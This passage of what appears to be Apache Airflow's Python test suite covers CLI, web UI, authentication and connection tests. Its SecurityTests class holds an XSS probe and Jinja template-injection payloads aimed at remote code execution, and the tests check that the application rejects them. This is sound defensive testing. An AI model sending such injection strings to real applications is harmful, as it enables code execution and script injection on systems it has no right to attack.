def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
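    # Poll until the daemon has written its pid file, then return the pid it contains.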
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
            except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
        except Exception:
            # an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
        # In Python 2.7 no conversion back to str is required
        # In Python >= 3 the password setter must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
                'path': '/datadirectory/not_empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
